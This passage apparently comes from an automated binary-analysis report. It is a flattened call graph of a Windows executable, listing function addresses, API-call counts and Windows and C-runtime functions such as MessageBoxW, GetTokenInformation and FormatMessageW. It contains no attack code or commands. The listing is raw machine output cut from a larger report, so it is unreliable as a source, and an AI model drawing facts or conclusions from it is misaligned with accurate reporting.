7ff60b124450 17384->18483 17386 7ff60b122710 54 API calls 17386->17379 17390 7ff60b122710 54 API calls 17389->17390 17390->17379 17391->17386 17392->17384 17396 7ff60b122710 54 API calls 17395->17396 17396->17379 17399 7ff60b121ca5 17398->17399 17400 7ff60b134984 49 API calls 17399->17400 17401 7ff60b121cc8 17400->17401 17401->17066 17403 7ff60b129390 2 API calls 17402->17403 17404 7ff60b1289b4 17403->17404 17405 7ff60b138238 38 API calls 17404->17405 17406 7ff60b1289c6 __vcrt_freefls 17405->17406 17406->17080 17408 7ff60b1245cc 17407->17408 17409 7ff60b129390 2 API calls 17408->17409 17410 7ff60b1245f4 17409->17410 17411 7ff60b129390 2 API calls 17410->17411 17412 7ff60b124607 17411->17412 18650 7ff60b135f94 17412->18650 17415 7ff60b12c550 _log10_special 8 API calls 17416 7ff60b12392b 17415->17416 17416->17069 17417 7ff60b127f90 17416->17417 17418 7ff60b127fb4 17417->17418 17419 7ff60b1306d4 73 API calls 17418->17419 17424 7ff60b12808b __vcrt_freefls 17418->17424 17420 7ff60b127fd0 17419->17420 17420->17424 19041 7ff60b1378c8 17420->19041 17422 7ff60b1306d4 73 API calls 17425 7ff60b127fe5 17422->17425 17423 7ff60b13039c _fread_nolock 53 API calls 17423->17425 17424->17073 17425->17422 17425->17423 17425->17424 17427 7ff60b13007c 17426->17427 19056 7ff60b12fe28 17427->19056 17429 7ff60b130095 17429->17069 17431 7ff60b12c850 17430->17431 17432 7ff60b122734 GetCurrentProcessId 17431->17432 17433 7ff60b121c80 49 API calls 17432->17433 17434 7ff60b122787 17433->17434 17435 7ff60b134984 49 API calls 17434->17435 17436 7ff60b1227cf 17435->17436 17437 7ff60b122620 12 API calls 17436->17437 17438 7ff60b1227f1 17437->17438 17439 7ff60b12c550 _log10_special 8 API calls 17438->17439 17440 7ff60b122801 17439->17440 17440->17176 17442 7ff60b129390 2 API calls 17441->17442 17443 7ff60b12895c 17442->17443 17444 7ff60b129390 2 API calls 17443->17444 17445 7ff60b12896c 17444->17445 17446 7ff60b138238 38 API calls 17445->17446 17447 7ff60b12897a __vcrt_freefls 17446->17447 17447->17083 17449 7ff60b121c80 49 API calls 17448->17449 17450 7ff60b1244fd 17449->17450 17450->17111 17452 7ff60b121c80 49 API calls 17451->17452 17453 7ff60b124660 17452->17453 17453->17127 17455 7ff60b126dd5 17454->17455 17456 7ff60b134f08 _get_daylight 11 API calls 17455->17456 17459 7ff60b123e6c 17455->17459 17457 7ff60b126de2 17456->17457 17458 7ff60b122910 54 API calls 17457->17458 17458->17459 17460 7ff60b127340 17459->17460 19067 7ff60b121470 17460->19067 19173 7ff60b126360 17528->19173 17548 7ff60b13546c EnterCriticalSection 17541->17548 17550 7ff60b1236bc GetModuleFileNameW 17549->17550 17550->17241 17550->17242 17552 7ff60b1292d2 17551->17552 17553 7ff60b1292bf FindClose 17551->17553 17554 7ff60b12c550 _log10_special 8 API calls 17552->17554 17553->17552 17555 7ff60b12371a 17554->17555 17555->17246 17555->17247 17557 7ff60b12c850 17556->17557 17558 7ff60b122c70 GetCurrentProcessId 17557->17558 17587 7ff60b1226b0 17558->17587 17560 7ff60b122cb9 17591 7ff60b134bd8 17560->17591 17563 7ff60b1226b0 48 API calls 17564 7ff60b122d34 FormatMessageW 17563->17564 17566 7ff60b122d6d 17564->17566 17567 7ff60b122d7f MessageBoxW 17564->17567 17568 7ff60b1226b0 48 API calls 17566->17568 17569 7ff60b12c550 _log10_special 8 API calls 17567->17569 17568->17567 17570 7ff60b122daf 17569->17570 17570->17255 17572 7ff60b123730 17571->17572 17573 7ff60b129340 GetFinalPathNameByHandleW CloseHandle 17571->17573 17572->17254 17572->17257 17573->17572 17575 7ff60b122834 17574->17575 17576 7ff60b1226b0 48 API calls 17575->17576 17577 7ff60b122887 17576->17577 17578 7ff60b134bd8 48 API calls 17577->17578 17579 7ff60b1228d0 MessageBoxW 17578->17579 17580 7ff60b12c550 _log10_special 8 API calls 17579->17580 17581 7ff60b122900 17580->17581 17581->17255 17583 7ff60b12946a WideCharToMultiByte 17582->17583 17584 7ff60b129495 17582->17584 17583->17584 17586 7ff60b1294ab __vcrt_freefls 17583->17586 17585 7ff60b1294b2 WideCharToMultiByte 17584->17585 17584->17586 17585->17586 17586->17253 17588 7ff60b1226d5 17587->17588 17589 7ff60b134bd8 48 API calls 17588->17589 17590 7ff60b1226f8 17589->17590 17590->17560 17594 7ff60b134c32 17591->17594 17592 7ff60b134c57 17593 7ff60b13a814 _invalid_parameter_noinfo 37 API calls 17592->17593 17608 7ff60b134c81 17593->17608 17594->17592 17595 7ff60b134c93 17594->17595 17609 7ff60b132f90 17595->17609 17597 7ff60b134d74 17600 7ff60b13a948 __free_lconv_mon 11 API calls 17597->17600 17599 7ff60b12c550 _log10_special 8 API calls 17601 7ff60b122d04 17599->17601 17600->17608 17601->17563 17602 7ff60b134d49 17605 7ff60b13a948 __free_lconv_mon 11 API calls 17602->17605 17603 7ff60b134d9a 17603->17597 17604 7ff60b134da4 17603->17604 17607 7ff60b13a948 __free_lconv_mon 11 API calls 17604->17607 17605->17608 17606 7ff60b134d40 17606->17597 17606->17602 17607->17608 17608->17599 17610 7ff60b132fce 17609->17610 17611 7ff60b132fbe 17609->17611 17612 7ff60b132fd7 17610->17612 17617 7ff60b133005 17610->17617 17615 7ff60b13a814 _invalid_parameter_noinfo 37 API calls 17611->17615 17613 7ff60b13a814 _invalid_parameter_noinfo 37 API calls 17612->17613 17614 7ff60b132ffd 17613->17614 17614->17597 17614->17602 17614->17603 17614->17606 17615->17614 17617->17611 17617->17614 17620 7ff60b1339a4 17617->17620 17653 7ff60b1333f0 17617->17653 17690 7ff60b132b80 17617->17690 17621 7ff60b1339e6 17620->17621 17622 7ff60b133a57 17620->17622 17623 7ff60b1339ec 17621->17623 17624 7ff60b133a81 17621->17624 17625 7ff60b133a5c 17622->17625 17626 7ff60b133ab0 17622->17626 17627 7ff60b133a20 17623->17627 17628 7ff60b1339f1 17623->17628 17713 7ff60b131d54 17624->17713 17629 7ff60b133a91 17625->17629 17630 7ff60b133a5e 17625->17630 17632 7ff60b133ac7 17626->17632 17634 7ff60b133aba 17626->17634 17638 7ff60b133abf 17626->17638 17635 7ff60b1339f7 17627->17635 17627->17638 17628->17632 17628->17635 17720 7ff60b131944 17629->17720 17633 7ff60b133a00 17630->17633 17643 7ff60b133a6d 17630->17643 17727 7ff60b1346ac 17632->17727 17651 7ff60b133af0 17633->17651 17693 7ff60b134158 17633->17693 17634->17624 17634->17638 17635->17633 17639 7ff60b133a1b 17635->17639 17642 7ff60b133a32 17635->17642 17638->17651 17731 7ff60b132164 17638->17731 17639->17651 17652 7ff60b133cdc 17639->17652 17738 7ff60b1347c0 17639->17738 17642->17651 17703 7ff60b134494 17642->17703 17643->17624 17644 7ff60b133a72 17643->17644 17644->17651 17709 7ff60b134558 17644->17709 17646 7ff60b12c550 _log10_special 8 API calls 17647 7ff60b133dea 17646->17647 17647->17617 17651->17646 17652->17651 17744 7ff60b13ea08 17652->17744 17654 7ff60b1333fe 17653->17654 17655 7ff60b133414 17653->17655 17656 7ff60b133454 17654->17656 17658 7ff60b1339e6 17654->17658 17659 7ff60b133a57 17654->17659 17655->17656 17657 7ff60b13a814 _invalid_parameter_noinfo 37 API calls 17655->17657 17656->17617 17657->17656 17660 7ff60b1339ec 17658->17660 17661 7ff60b133a81 17658->17661 17662 7ff60b133a5c 17659->17662 17663 7ff60b133ab0 17659->17663 17664 7ff60b133a20 17660->17664 17665 7ff60b1339f1 17660->17665 17668 7ff60b131d54 38 API calls 17661->17668 17666 7ff60b133a91 17662->17666 17667 7ff60b133a5e 17662->17667 17669 7ff60b133ac7 17663->17669 17671 7ff60b133aba 17663->17671 17675 7ff60b133abf 17663->17675 17672 7ff60b1339f7 17664->17672 17664->17675 17665->17669 17665->17672 17673 7ff60b131944 38 API calls 17666->17673 17670 7ff60b133a00 17667->17670 17678 7ff60b133a6d 17667->17678 17685 7ff60b133a1b 17668->17685 17676 7ff60b1346ac 45 API calls 17669->17676 17674 7ff60b134158 47 API calls 17670->17674 17688 7ff60b133af0 17670->17688 17671->17661 17671->17675 17672->17670 17679 7ff60b133a32 17672->17679 17672->17685 17673->17685 17674->17685 17677 7ff60b132164 38 API calls 17675->17677 17675->17688 17676->17685 17677->17685 17678->17661 17680 7ff60b133a72 17678->17680 17681 7ff60b134494 46 API calls 17679->17681 17679->17688 17683 7ff60b134558 37 API calls 17680->17683 17680->17688 17681->17685 17682 7ff60b12c550 _log10_special 8 API calls 17684 7ff60b133dea 17682->17684 17683->17685 17684->17617 17686 7ff60b1347c0 45 API calls 17685->17686 17685->17688 17689 7ff60b133cdc 17685->17689 17686->17689 17687 7ff60b13ea08 46 API calls 17687->17689 17688->17682 17689->17687 17689->17688 17910 7ff60b130fc8 17690->17910 17694 7ff60b13417e 17693->17694 17756 7ff60b130b80 17694->17756 17699 7ff60b1347c0 45 API calls 17700 7ff60b1342c3 17699->17700 17701 7ff60b1347c0 45 API calls 17700->17701 17702 7ff60b134351 17700->17702 17701->17702 17702->17639 17705 7ff60b1344c9 17703->17705 17704 7ff60b1344e7 17707 7ff60b13ea08 46 API calls 17704->17707 17705->17704 17706 7ff60b1347c0 45 API calls 17705->17706 17708 7ff60b13450e 17705->17708 17706->17704 17707->17708 17708->17639 17711 7ff60b134579 17709->17711 17710 7ff60b13a814 _invalid_parameter_noinfo 37 API calls 17712 7ff60b1345aa 17710->17712 17711->17710 17711->17712 17712->17639 17714 7ff60b131d87 17713->17714 17715 7ff60b131db6 17714->17715 17718 7ff60b131e73 17714->17718 17716 7ff60b131df3 17715->17716 17883 7ff60b130c28 17715->17883 17716->17639 17719 7ff60b13a814 _invalid_parameter_noinfo 37 API calls 17718->17719 17719->17716 17721 7ff60b131977 17720->17721 17722 7ff60b1319a6 17721->17722 17724 7ff60b131a63 17721->17724 17723 7ff60b130c28 12 API calls 17722->17723 17726 7ff60b1319e3 17722->17726 17723->17726 17725 7ff60b13a814 _invalid_parameter_noinfo 37 API calls 17724->17725 17725->17726 17726->17639 17728 7ff60b1346ef 17727->17728 17729 7ff60b1346f3 __crtLCMapStringW 17728->17729 17891 7ff60b134748 17728->17891 17729->17639 17733 7ff60b132197 17731->17733 17732 7ff60b1321c6 17734 7ff60b130c28 12 API calls 17732->17734 17737 7ff60b132203 17732->17737 17733->17732 17735 7ff60b132283 17733->17735 17734->17737 17736 7ff60b13a814 _invalid_parameter_noinfo 37 API calls 17735->17736 17736->17737 17737->17639 17739 7ff60b1347d7 17738->17739 17895 7ff60b13d9b8 17739->17895 17746 7ff60b13ea39 17744->17746 17753 7ff60b13ea47 17744->17753 17745 7ff60b13ea67 17748 7ff60b13ea78 17745->17748 17749 7ff60b13ea9f 17745->17749 17746->17745 17747 7ff60b1347c0 45 API calls 17746->17747 17746->17753 17747->17745 17903 7ff60b1400a0 17748->17903 17751 7ff60b13eac9 17749->17751 17752 7ff60b13eb2a 17749->17752 17749->17753 17751->17753 17755 7ff60b13f8a0 _fread_nolock MultiByteToWideChar 17751->17755 17754 7ff60b13f8a0 _fread_nolock MultiByteToWideChar 17752->17754 17753->17652 17754->17753 17755->17753 17757 7ff60b130bb7 17756->17757 17763 7ff60b130ba6 17756->17763 17758 7ff60b13d5fc _fread_nolock 12 API calls 17757->17758 17757->17763 17759 7ff60b130be4 17758->17759 17760 7ff60b13a948 __free_lconv_mon 11 API calls 17759->17760 17762 7ff60b130bf8 17759->17762 17760->17762 17761 7ff60b13a948 __free_lconv_mon 11 API calls 17761->17763 17762->17761 17764 7ff60b13e570 17763->17764 17765 7ff60b13e58d 17764->17765 17766 7ff60b13e5c0 17764->17766 17767 7ff60b13a814 _invalid_parameter_noinfo 37 API calls 17765->17767 17766->17765 17768 7ff60b13e5f2 17766->17768 17776 7ff60b1342a1 17767->17776 17772 7ff60b13e705 17768->17772 17779 7ff60b13e63a 17768->17779 17769 7ff60b13e7f7 17810 7ff60b13da5c 17769->17810 17771 7ff60b13e7bd 17803 7ff60b13ddf4 17771->17803 17772->17769 17772->17771 17773 7ff60b13e78c 17772->17773 17775 7ff60b13e74f 17772->17775 17778 7ff60b13e745 17772->17778 17796 7ff60b13e0d4 17773->17796 17786 7ff60b13e304 17775->17786 17776->17699 17776->17700 17778->17771 17781 7ff60b13e74a 17778->17781 17779->17776 17782 7ff60b13a4a4 __std_exception_copy 37 API calls 17779->17782 17781->17773 17781->17775 17783 7ff60b13e6f2 17782->17783 17783->17776 17784 7ff60b13a900 _isindst 17 API calls 17783->17784 17785 7ff60b13e854 17784->17785 17819 7ff60b1440ac 17786->17819 17790 7ff60b13e3ac 17791 7ff60b13e401 17790->17791 17793 7ff60b13e3cc 17790->17793 17795 7ff60b13e3b0 17790->17795 17872 7ff60b13def0 17791->17872 17868 7ff60b13e1ac 17793->17868 17795->17776 17797 7ff60b1440ac 38 API calls 17796->17797 17798 7ff60b13e11e 17797->17798 17799 7ff60b143af4 37 API calls 17798->17799 17800 7ff60b13e16e 17799->17800 17801 7ff60b13e172 17800->17801 17802 7ff60b13e1ac 45 API calls 17800->17802 17801->17776 17802->17801 17804 7ff60b1440ac 38 API calls 17803->17804 17805 7ff60b13de3f 17804->17805 17806 7ff60b143af4 37 API calls 17805->17806 17807 7ff60b13de97 17806->17807 17808 7ff60b13de9b 17807->17808 17809 7ff60b13def0 45 API calls 17807->17809 17808->17776 17809->17808 17811 7ff60b13daa1 17810->17811 17812 7ff60b13dad4 17810->17812 17813 7ff60b13a814 _invalid_parameter_noinfo 37 API calls 17811->17813 17814 7ff60b13daec 17812->17814 17816 7ff60b13db6d 17812->17816 17818 7ff60b13dacd memcpy_s 17813->17818 17815 7ff60b13ddf4 46 API calls 17814->17815 17815->17818 17817 7ff60b1347c0 45 API calls 17816->17817 17816->17818 17817->17818 17818->17776 17820 7ff60b1440ff fegetenv 17819->17820 17821 7ff60b147e2c 37 API calls 17820->17821 17826 7ff60b144152 17821->17826 17822 7ff60b14417f 17825 7ff60b13a4a4 __std_exception_copy 37 API calls 17822->17825 17823 7ff60b144242 17824 7ff60b147e2c 37 API calls 17823->17824 17827 7ff60b14426c 17824->17827 17828 7ff60b1441fd 17825->17828 17826->17823 17829 7ff60b14416d 17826->17829 17830 7ff60b14421c 17826->17830 17831 7ff60b147e2c 37 API calls 17827->17831 17832 7ff60b145324 17828->17832 17838 7ff60b144205 17828->17838 17829->17822 17829->17823 17833 7ff60b13a4a4 __std_exception_copy 37 API calls 17830->17833 17834 7ff60b14427d 17831->17834 17835 7ff60b13a900 _isindst 17 API calls 17832->17835 17833->17828 17836 7ff60b148020 20 API calls 17834->17836 17837 7ff60b145339 17835->17837 17846 7ff60b1442e6 memcpy_s 17836->17846 17839 7ff60b12c550 _log10_special 8 API calls 17838->17839 17840 7ff60b13e351 17839->17840 17864 7ff60b143af4 17840->17864 17841 7ff60b14468f memcpy_s 17842 7ff60b1449cf 17843 7ff60b143c10 37 API calls 17842->17843 17850 7ff60b1450e7 17843->17850 17844 7ff60b14497b 17844->17842 17847 7ff60b14533c memcpy_s 37 API calls 17844->17847 17845 7ff60b144327 memcpy_s 17860 7ff60b144c6b memcpy_s 17845->17860 17861 7ff60b144783 memcpy_s 17845->17861 17846->17841 17846->17845 17848 7ff60b134f08 _get_daylight 11 API calls 17846->17848 17847->17842 17849 7ff60b144760 17848->17849 17851 7ff60b13a8e0 _invalid_parameter_noinfo 37 API calls 17849->17851 17852 7ff60b14533c memcpy_s 37 API calls 17850->17852 17857 7ff60b145142 17850->17857 17851->17845 17852->17857 17853 7ff60b1452c8 17856 7ff60b147e2c 37 API calls 17853->17856 17854 7ff60b134f08 11 API calls _get_daylight 17854->17860 17855 7ff60b134f08 11 API calls _get_daylight 17855->17861 17856->17838 17857->17853 17858 7ff60b143c10 37 API calls 17857->17858 17863 7ff60b14533c memcpy_s 37 API calls 17857->17863 17858->17857 17859 7ff60b13a8e0 37 API calls _invalid_parameter_noinfo 17859->17860 17860->17842 17860->17844 17860->17854 17860->17859 17861->17844 17861->17855 17862 7ff60b13a8e0 37 API calls _invalid_parameter_noinfo 17861->17862 17862->17861 17863->17857 17865 7ff60b143b13 17864->17865 17866 7ff60b13a814 _invalid_parameter_noinfo 37 API calls 17865->17866 17867 7ff60b143b3e memcpy_s 17865->17867 17866->17867 17867->17790 17869 7ff60b13e1d8 memcpy_s 17868->17869 17870 7ff60b1347c0 45 API calls 17869->17870 17871 7ff60b13e292 memcpy_s 17869->17871 17870->17871 17871->17795 17873 7ff60b13df2b 17872->17873 17877 7ff60b13df78 memcpy_s 17872->17877 17874 7ff60b13a814 _invalid_parameter_noinfo 37 API calls 17873->17874 17875 7ff60b13df57 17874->17875 17875->17795 17876 7ff60b13dfe3 17878 7ff60b13a4a4 __std_exception_copy 37 API calls 17876->17878 17877->17876 17879 7ff60b1347c0 45 API calls 17877->17879 17882 7ff60b13e025 memcpy_s 17878->17882 17879->17876 17880 7ff60b13a900 _isindst 17 API calls 17881 7ff60b13e0d0 17880->17881 17882->17880 17884 7ff60b130c5f 17883->17884 17890 7ff60b130c4e 17883->17890 17885 7ff60b13d5fc _fread_nolock 12 API calls 17884->17885 17884->17890 17886 7ff60b130c90 17885->17886 17887 7ff60b130ca4 17886->17887 17888 7ff60b13a948 __free_lconv_mon 11 API calls 17886->17888 17889 7ff60b13a948 __free_lconv_mon 11 API calls 17887->17889 17888->17887 17889->17890 17890->17716 17892 7ff60b134766 17891->17892 17893 7ff60b13476e 17891->17893 17894 7ff60b1347c0 45 API calls 17892->17894 17893->17729 17894->17893 17896 7ff60b1347ff 17895->17896 17897 7ff60b13d9d1 17895->17897 17899 7ff60b13da24 17896->17899 17897->17896 17898 7ff60b143304 45 API calls 17897->17898 17898->17896 17900 7ff60b13da3d 17899->17900 17901 7ff60b13480f 17899->17901 17900->17901 17902 7ff60b142650 45 API calls 17900->17902 17901->17652 17902->17901 17906 7ff60b146d88 17903->17906 17909 7ff60b146dec 17906->17909 17907 7ff60b12c550 _log10_special 8 API calls 17908 7ff60b1400bd 17907->17908 17908->17753 17909->17907 17911 7ff60b130ffd 17910->17911 17912 7ff60b13100f 17910->17912 17913 7ff60b134f08 _get_daylight 11 API calls 17911->17913 17915 7ff60b13101d 17912->17915 17919 7ff60b131059 17912->17919 17914 7ff60b131002 17913->17914 17916 7ff60b13a8e0 _invalid_parameter_noinfo 37 API calls 17914->17916 17917 7ff60b13a814 _invalid_parameter_noinfo 37 API calls 17915->17917 17918 7ff60b13100d 17916->17918 17917->17918 17918->17617 17920 7ff60b1313d5 17919->17920 17922 7ff60b134f08 _get_daylight 11 API calls 17919->17922 17920->17918 17921 7ff60b134f08 _get_daylight 11 API calls 17920->17921 17923 7ff60b131669 17921->17923 17924 7ff60b1313ca 17922->17924 17925 7ff60b13a8e0 _invalid_parameter_noinfo 37 API calls 17923->17925 17926 7ff60b13a8e0 _invalid_parameter_noinfo 37 API calls 17924->17926 17925->17918 17926->17920 17928 7ff60b130704 17927->17928 17955 7ff60b130464 17928->17955 17930 7ff60b13071d 17930->17270 17967 7ff60b1303bc 17931->17967 17935 7ff60b12c850 17934->17935 17936 7ff60b122930 GetCurrentProcessId 17935->17936 17937 7ff60b121c80 49 API calls 17936->17937 17938 7ff60b122979 17937->17938 17981 7ff60b134984 17938->17981 17943 7ff60b121c80 49 API calls 17944 7ff60b1229ff 17943->17944 18011 7ff60b122620 17944->18011 17947 7ff60b12c550 _log10_special 8 API calls 17948 7ff60b122a31 17947->17948 17948->17281 17950 7ff60b130119 17949->17950 17951 7ff60b121b89 17949->17951 17952 7ff60b134f08 _get_daylight 11 API calls 17950->17952 17951->17281 17951->17309 17953 7ff60b13011e 17952->17953 17954 7ff60b13a8e0 _invalid_parameter_noinfo 37 API calls 17953->17954 17954->17951 17956 7ff60b1304ce 17955->17956 17957 7ff60b13048e 17955->17957 17956->17957 17959 7ff60b1304da 17956->17959 17958 7ff60b13a814 _invalid_parameter_noinfo 37 API calls 17957->17958 17960 7ff60b1304b5 17958->17960 17966 7ff60b13546c EnterCriticalSection 17959->17966 17960->17930 17968 7ff60b1303e6 17967->17968 17979 7ff60b121a20 17967->17979 17969 7ff60b1303f5 memcpy_s 17968->17969 17970 7ff60b130432 17968->17970 17968->17979 17972 7ff60b134f08 _get_daylight 11 API calls 17969->17972 17980 7ff60b13546c EnterCriticalSection 17970->17980 17974 7ff60b13040a 17972->17974 17976 7ff60b13a8e0 _invalid_parameter_noinfo 37 API calls 17974->17976 17976->17979 17979->17277 17979->17278 17982 7ff60b1349de 17981->17982 17983 7ff60b134a03 17982->17983 17984 7ff60b134a3f 17982->17984 17985 7ff60b13a814 _invalid_parameter_noinfo 37 API calls 17983->17985 18020 7ff60b132c10 17984->18020 17987 7ff60b134a2d 17985->17987 17988 7ff60b12c550 _log10_special 8 API calls 17987->17988 17991 7ff60b1229c3 17988->17991 17989 7ff60b13a948 __free_lconv_mon 11 API calls 17989->17987 17999 7ff60b135160 17991->17999 17992 7ff60b134b40 17994 7ff60b134b4a 17992->17994 17997 7ff60b134b1c 17992->17997 17993 7ff60b134ae8 17996 7ff60b134af1 17993->17996 17993->17997 17998 7ff60b13a948 __free_lconv_mon 11 API calls 17994->17998 17995 7ff60b13a948 __free_lconv_mon 11 API calls 17995->17987 17996->17995 17997->17989 17998->17987 18000 7ff60b13b2c8 _get_daylight 11 API calls 17999->18000 18001 7ff60b135177 18000->18001 18002 7ff60b1229e5 18001->18002 18003 7ff60b13eb98 _get_daylight 11 API calls 18001->18003 18006 7ff60b1351b7 18001->18006 18002->17943 18004 7ff60b1351ac 18003->18004 18005 7ff60b13a948 __free_lconv_mon 11 API calls 18004->18005 18005->18006 18006->18002 18155 7ff60b13ec20 18006->18155 18009 7ff60b13a900 _isindst 17 API calls 18010 7ff60b1351fc 18009->18010 18012 7ff60b12262f 18011->18012 18013 7ff60b129390 2 API calls 18012->18013 18014 7ff60b122660 18013->18014 18015 7ff60b12266f MessageBoxW 18014->18015 18016 7ff60b122683 MessageBoxA 18014->18016 18017 7ff60b122690 18015->18017 18016->18017 18018 7ff60b12c550 _log10_special 8 API calls 18017->18018 18019 7ff60b1226a0 18018->18019 18019->17947 18021 7ff60b132c4e 18020->18021 18022 7ff60b132c3e 18020->18022 18023 7ff60b132c57 18021->18023 18030 7ff60b132c85 18021->18030 18026 7ff60b13a814 _invalid_parameter_noinfo 37 API calls 18022->18026 18024 7ff60b13a814 _invalid_parameter_noinfo 37 API calls 18023->18024 18025 7ff60b132c7d 18024->18025 18025->17992 18025->17993 18025->17996 18025->17997 18026->18025 18027 7ff60b1347c0 45 API calls 18027->18030 18028 7ff60b132f34 18032 7ff60b13a814 _invalid_parameter_noinfo 37 API calls 18028->18032 18030->18022 18030->18025 18030->18027 18030->18028 18034 7ff60b1335a0 18030->18034 18060 7ff60b133268 18030->18060 18090 7ff60b132af0 18030->18090 18032->18022 18035 7ff60b133655 18034->18035 18036 7ff60b1335e2 18034->18036 18039 7ff60b13365a 18035->18039 18040 7ff60b1336af 18035->18040 18037 7ff60b1335e8 18036->18037 18038 7ff60b13367f 18036->18038 18045 7ff60b1335ed 18037->18045 18048 7ff60b1336be 18037->18048 18107 7ff60b131b50 18038->18107 18041 7ff60b13365c 18039->18041 18042 7ff60b13368f 18039->18042 18040->18038 18040->18048 18059 7ff60b133618 18040->18059 18044 7ff60b1335fd 18041->18044 18051 7ff60b13366b 18041->18051 18114 7ff60b131740 18042->18114 18057 7ff60b1336ed 18044->18057 18093 7ff60b133f04 18044->18093 18045->18044 18049 7ff60b133630 18045->18049 18045->18059 18048->18057 18121 7ff60b131f60 18048->18121 18049->18057 18103 7ff60b1343c0 18049->18103 18051->18038 18053 7ff60b133670 18051->18053 18055 7ff60b134558 37 API calls 18053->18055 18053->18057 18054 7ff60b12c550 _log10_special 8 API calls 18056 7ff60b133983 18054->18056 18055->18059 18056->18030 18057->18054 18059->18057 18128 7ff60b13e858 18059->18128 18061 7ff60b133289 18060->18061 18062 7ff60b133273 18060->18062 18063 7ff60b13a814 _invalid_parameter_noinfo 37 API calls 18061->18063 18064 7ff60b1332c7 18061->18064 18062->18064 18065 7ff60b133655 18062->18065 18066 7ff60b1335e2 18062->18066 18063->18064 18064->18030 18069 7ff60b13365a 18065->18069 18070 7ff60b1336af 18065->18070 18067 7ff60b1335e8 18066->18067 18068 7ff60b13367f 18066->18068 18077 7ff60b1335ed 18067->18077 18079 7ff60b1336be 18067->18079 18073 7ff60b131b50 38 API calls 18068->18073 18071 7ff60b13365c 18069->18071 18072 7ff60b13368f 18069->18072 18070->18068 18070->18079 18088 7ff60b133618 18070->18088 18074 7ff60b1335fd 18071->18074 18081 7ff60b13366b 18071->18081 18075 7ff60b131740 38 API calls 18072->18075 18073->18088 18076 7ff60b133f04 47 API calls 18074->18076 18089 7ff60b1336ed 18074->18089 18075->18088 18076->18088 18077->18074 18078 7ff60b133630 18077->18078 18077->18088 18082 7ff60b1343c0 47 API calls 18078->18082 18078->18089 18080 7ff60b131f60 38 API calls 18079->18080 18079->18089 18080->18088 18081->18068 18083 7ff60b133670 18081->18083 18082->18088 18085 7ff60b134558 37 API calls 18083->18085 18083->18089 18084 7ff60b12c550 _log10_special 8 API calls 18086 7ff60b133983 18084->18086 18085->18088 18086->18030 18087 7ff60b13e858 47 API calls 18087->18088 18088->18087 18088->18089 18089->18084 18138 7ff60b130d14 18090->18138 18094 7ff60b133f26 18093->18094 18095 7ff60b130b80 12 API calls 18094->18095 18096 7ff60b133f6e 18095->18096 18097 7ff60b13e570 46 API calls 18096->18097 18098 7ff60b134041 18097->18098 18100 7ff60b1347c0 45 API calls 18098->18100 18101 7ff60b134063 18098->18101 18099 7ff60b1340ec 18099->18059 18100->18101 18101->18099 18102 7ff60b1347c0 45 API calls 18101->18102 18102->18099 18104 7ff60b1343d8 18103->18104 18106 7ff60b134440 18103->18106 18105 7ff60b13e858 47 API calls 18104->18105 18104->18106 18105->18106 18106->18059 18108 7ff60b131b83 18107->18108 18109 7ff60b131bb2 18108->18109 18111 7ff60b131c6f 18108->18111 18110 7ff60b130b80 12 API calls 18109->18110 18113 7ff60b131bef 18109->18113 18110->18113 18112 7ff60b13a814 _invalid_parameter_noinfo 37 API calls 18111->18112 18112->18113 18113->18059 18115 7ff60b131773 18114->18115 18116 7ff60b1317a2 18115->18116 18119 7ff60b13185f 18115->18119 18117 7ff60b1317df 18116->18117 18118 7ff60b130b80 12 API calls 18116->18118 18117->18059 18118->18117 18120 7ff60b13a814 _invalid_parameter_noinfo 37 API calls 18119->18120 18120->18117 18122 7ff60b131f93 18121->18122 18123 7ff60b131fc2 18122->18123 18125 7ff60b13207f 18122->18125 18124 7ff60b130b80 12 API calls 18123->18124 18127 7ff60b131fff 18123->18127 18124->18127 18126 7ff60b13a814 _invalid_parameter_noinfo 37 API calls 18125->18126 18126->18127 18127->18059 18129 7ff60b13e880 18128->18129 18130 7ff60b13e8c5 18129->18130 18132 7ff60b1347c0 45 API calls 18129->18132 18134 7ff60b13e885 memcpy_s 18129->18134 18137 7ff60b13e8ae memcpy_s 18129->18137 18133 7ff60b1407e8 WideCharToMultiByte 18130->18133 18130->18134 18130->18137 18131 7ff60b13a814 _invalid_parameter_noinfo 37 API calls 18131->18134 18132->18130 18135 7ff60b13e9a1 18133->18135 18134->18059 18135->18134 18136 7ff60b13e9b6 GetLastError 18135->18136 18136->18134 18136->18137 18137->18131 18137->18134 18139 7ff60b130d41 18138->18139 18140 7ff60b130d53 18138->18140 18141 7ff60b134f08 _get_daylight 11 API calls 18139->18141 18143 7ff60b130d60 18140->18143 18146 7ff60b130d9d 18140->18146 18142 7ff60b130d46 18141->18142 18144 7ff60b13a8e0 _invalid_parameter_noinfo 37 API calls 18142->18144 18145 7ff60b13a814 _invalid_parameter_noinfo 37 API calls 18143->18145 18150 7ff60b130d51 18144->18150 18145->18150 18147 7ff60b130e46 18146->18147 18148 7ff60b134f08 _get_daylight 11 API calls 18146->18148 18149 7ff60b134f08 _get_daylight 11 API calls 18147->18149 18147->18150 18151 7ff60b130e3b 18148->18151 18152 7ff60b130ef0 18149->18152 18150->18030 18154 7ff60b13a8e0 _invalid_parameter_noinfo 37 API calls 18151->18154 18153 7ff60b13a8e0 _invalid_parameter_noinfo 37 API calls 18152->18153 18153->18150 18154->18147 18159 7ff60b13ec3d 18155->18159 18156 7ff60b13ec42 18157 7ff60b1351dd 18156->18157 18158 7ff60b134f08 _get_daylight 11 API calls 18156->18158 18157->18002 18157->18009 18160 7ff60b13ec4c 18158->18160 18159->18156 18159->18157 18162 7ff60b13ec8c 18159->18162 18161 7ff60b13a8e0 _invalid_parameter_noinfo 37 API calls 18160->18161 18161->18157 18162->18157 18163 7ff60b134f08 _get_daylight 11 API calls 18162->18163 18163->18160 18165 7ff60b1285b1 GetTokenInformation 18164->18165 18166 7ff60b128633 __vcrt_freefls 18164->18166 18167 7ff60b1285d2 GetLastError 18165->18167 18170 7ff60b1285dd 18165->18170 18168 7ff60b128646 CloseHandle 18166->18168 18169 7ff60b12864c 18166->18169 18167->18166 18167->18170 18168->18169 18169->17327 18170->18166 18171 7ff60b1285f9 GetTokenInformation 18170->18171 18171->18166 18172 7ff60b12861c 18171->18172 18172->18166 18173 7ff60b128626 ConvertSidToStringSidW 18172->18173 18173->18166 18175 7ff60b12c850 18174->18175 18176 7ff60b122b74 GetCurrentProcessId 18175->18176 18177 7ff60b1226b0 48 API calls 18176->18177 18178 7ff60b122bc7 18177->18178 18179 7ff60b134bd8 48 API calls 18178->18179 18180 7ff60b122c10 MessageBoxW 18179->18180 18181 7ff60b12c550 _log10_special 8 API calls 18180->18181 18182 7ff60b122c40 